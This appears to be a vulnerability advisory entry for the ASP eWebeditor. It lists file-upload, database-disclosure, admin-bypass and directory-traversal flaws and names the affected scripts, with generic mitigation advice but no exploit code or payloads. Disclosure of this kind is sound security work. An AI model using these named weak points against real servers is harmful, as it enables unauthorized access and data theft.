vendor: eWebeditor
by: Anonymous
CVSS: 8,8 HIGH
Arbitrary File Upload, Database Disclosure, Administrator Bypass, Directory Traversal
CWE: 434, 200, 264, 22
Product Name: eWebeditor
Affected Version From: ASP
Affected Version To: ASP
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020
eWebeditor Arbitrary File Upload, Database Disclosure, Administrator Bypass, Directory Traversal Vulnerabilities
Arbitrary File Upload: An attacker can upload arbitrary files to the vulnerable server by exploiting the upload.asp script.
Database Disclosure: An attacker can access the eweb editor database by exploiting the eweb editor.mdb script.
Administrator Bypass: An attacker can bypass the administrator authentication by using the login.asp script.
Directory Traversal: An attacker can traverse the directory structure of the vulnerable server by exploiting the upload.asp and browse.asp scripts.
Mitigation:
Ensure that the application is up to date and all security patches are applied. Restrict access to the application and its components to only authorized users. Ensure that the application is configured securely and all unnecessary features are disabled.